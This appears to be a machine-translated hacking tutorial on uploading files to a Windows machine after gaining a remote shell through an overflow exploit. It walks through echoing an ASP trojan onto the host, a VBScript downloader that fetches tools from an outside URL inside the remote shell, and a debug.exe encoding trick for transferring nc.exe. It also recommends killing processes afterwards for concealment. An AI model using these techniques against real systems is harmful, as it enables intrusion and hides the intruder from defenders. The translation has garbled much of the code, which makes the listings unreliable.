File Transfer
The biggest problem with the CMD shell obtained by the overflow vulnerability is how to upload files. Due to the prevalence of worms, ports 139 or 445 required to connect to IPC $ are blocked by routes. In addition, the WINXP system enhances the protection of IPC $, and the use of IPC $ and default shared file upload methods is basically ineffective. FTP and TFTP are two feasible methods, which are well known and will not be described in this article. There are three other methods that you are familiar with. To sum up, I will try again:
1. Use the echo command to write ASP Trojans.
The premise is that IIS has been installed on the target host.
The general ASP Trojan is large in size and is not suitable for writing files directly using the echo command. Here I provide a small one.
The echo version is provided directly:
@ Echo ^> up. asp
Note that there is only one line and there is no carriage return in the middle.
The generated up. asp cannot be accessed using a browser. You can only use the following script:
With wscript
If. Arguments. Count> DL. vbs
@ Echo W. open "get ",. arguments (0), 0: W. send: If W. status ^> 200 then. echo "error:" + W. status :. quit> DL. vbs
@ Echo ASO. type = 1: ASO. Open: ASO. Write W. responsebody: ASO. savetofile. Arguments (1), 2: end with> DL. vbs
Example: Download ps.exe and save it to c: \ path:
Cscript DL. vbs http://www.sometips.com/soft/ps.exe c: \ path \ ps.exe
Note that this is executed in the remote shell.
4. Execute the script + debug to restore any encoded ECHO file.
Neither of the preceding methods can pass through the firewall. In addition, except for self-built Web servers, general web resources are provided in the form of compressed files. If the target host does not have a decompression tool, it is still the same. Then there is only "killer!
The echo command can increase the value of the X operator to write ASCII code less than 128 characters, but not greater than or equal to 128. You can easily write local files to the remote host only by re-encoding the local files to display characters. The first thing we can think of is base64 encoding, that is, the encoding method of email attachments. However, vbs does not support bitwise X, so encoding and decoding are complicated. What's more troublesome is that the ability of scripts to process files in a binary stream is poor. (ADODB. Stream can write files in stream mode, but I cannot construct the corresponding data type. Binary data streams can be converted into strings using the midb function, but this is not the case. It took me two days to solve the problem. If anyone can use vbs or js to write any byte data to a file, please kindly advise .)
No. You only need debug.exe. Many people know the principle. I will not introduce it, but I will directly give the result-encoding script:
fp = wscript. arguments (0)
fn = right (FP, Len (FP)-limit Rev (FP, "\")
with Createobject ("ADODB. stream ")
. type = 1 :. open :. loadfromfile FP: Str =. read: SL = lenb (STR)
end with
sll = SL mod 65536: SLH = sl \ 65536
with Createobject ("scripting. fileSystemObject "). opentextfile (FP &". bat ", 2, true)
. write "@ echo STR ="
for I = 1 to SL
bt = ASCB (midb (STR, I, 1 ))
If BT> debug. vbs "+ vbcrlf +" @ echo + "
next
. writeline "> debug. vbs "+ vbcrlf +" @ echo with wscript. stdout: r = vbcrlf "_
+": for I = 1 to Len (STR) Step 48 :. write "" E "" + hex (256 + (I-1)/2) "_
+": For J = I to I + 46 Step 2 :. write "+ mid (STR, J, 2): Next :. write R: Next> debug. vbs "
. writeline "@ echo. write "" RBx "" + R + "+ hex (SLH) +" + R + "" rcX "" + R + "+ hex (SLL) _
+ "+ R +" "N debug. TMP "" + R + "" W "" + R + "Q" "+ R: end with" _
+ "> debug. vbs & cscript // nologo debug. vbs | debug.exe> NUL & Ren debug. TMP "" & FN & "" & del debug. vbs "
end with
Save it as Echo. vbs. To upload nc.exe, run the following command on the local command line:
Cscript echo. vbs nc.exe
You can also drag and drop the icon of the file to be transferred to the icon of the script file.
Just a moment later, A nc.exe. bat will be generated in the current directory. Open it with notepad and other editing tools. You can see the following content:
@ Echo STR = "Courier" _> Debug. vbs
@ Echo + "login" _> Debug. vbs
@ Echo + "login" _> Debug. vbs
@ Echo + "login" _> Debug. vbs
............
............ (Omitted rows)
............
@ Echo + ""> Debug. vbs
@ Echo with wscript. stdout: r = vbcrlf: for I = 1 to Len (STR) Step 48 :. write "E" + hex (256 + (I-1)/2): For J = I to I + 46 Step 2 :. write "" + mid (STR, J, 2): Next :. write R: Next> debug. vbs
@ Echo. write "RBx" + R + "0" + R + "rcX" + R + "E800" + R + "n debug. TMP "+ R +" W "+ R +" Q "+ R: end with> debug. vbs & cscript // nologo debug. vbs | debug.exe> NUL & Ren debug. TMP "NC. EXE "& del debug. vbs
Select All> copy> switch to the remote command line window and paste it.
If the network speed is not slow, the entire upload process takes about 20 seconds.
Notes:
1. The transmission of large files is unstable and may cause shell to die. The smaller the file, the better the effect. We recommend that the size of the original file not exceed kb.
2. Before transferring large files, you can first upload a small file as a "warm-up" to allow 16-bit Virtual Machine ntvdm.exe to reside in the background. After all files are uploaded, The NTVDM process should be killed for concealment.
3. Some command lines in cmd shellrun two additional vehicles, so nc.exe. Bat cannot be used directly.
4. The length of a single command is limited. Therefore, you cannot use only one echo to complete all tasks. In addition, for the CMD shell provided by NC, a longer command will automatically cause shell to exit (overflow ?). You can modify 128 in the "I mod 128 = 0" statement to adjust the length of each echo command. The character of each ECHO is multiplied by 2.
5. No script is involved in the decoding process. The script is used to reduce the amount of data transmitted (because the data is compressed ). If I have time, I will write a better script, strengthen the data compression capability, and add the data validation function.
Of course everything is easy to upload files, but many X tools are more convenient for Windows. When looking for the required tools, do not forget Windows itself.